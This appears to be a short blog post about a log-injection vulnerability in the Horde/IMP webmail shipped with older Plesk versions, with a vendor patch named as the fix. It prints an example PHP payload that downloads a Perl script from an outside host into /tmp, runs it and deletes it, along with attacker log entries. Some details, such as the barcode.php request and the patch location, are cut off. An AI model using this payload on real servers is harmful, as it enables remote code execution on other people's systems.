Tag Archives: horde issue

A vulnerability with older versions of Horde/IMP in Plesk !

The Horde/IMP package (3.1.7-3.3.2) that is shipped with Plesk v. 8.x and earlier versions of 9.x (before 9.5.4) has a vulnerability that allows an attacker to run malicious software by passing the login to the webmail with a POST request to the /horde/imp/redirect.php file that includes the PHP code as the username. For example:

<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;

perl new.txt;rm -rf new.txt"); ?>

This results in the PHP code being logged to the /var/log/psa-horde/psa-horde.log file, which, due to a vulnerability in the barcode.php file, allows attackers to cause Horde to execute the code by making this request:



Here is what the actual requests the attacker uses and the log entry from the psa-horde.log
file would look like:

xx.xx.xx.xx - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php

HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:

Gecko/20091102 Firefox/3.5.5"

xx.xx.xx.xx - - [17/Jan/2012:08:01:35 -0500] " /horde/util/barcode.php?


Resolution as suggested by parallels is downloading the patch for Horde and place it in

Patch can be obtained from :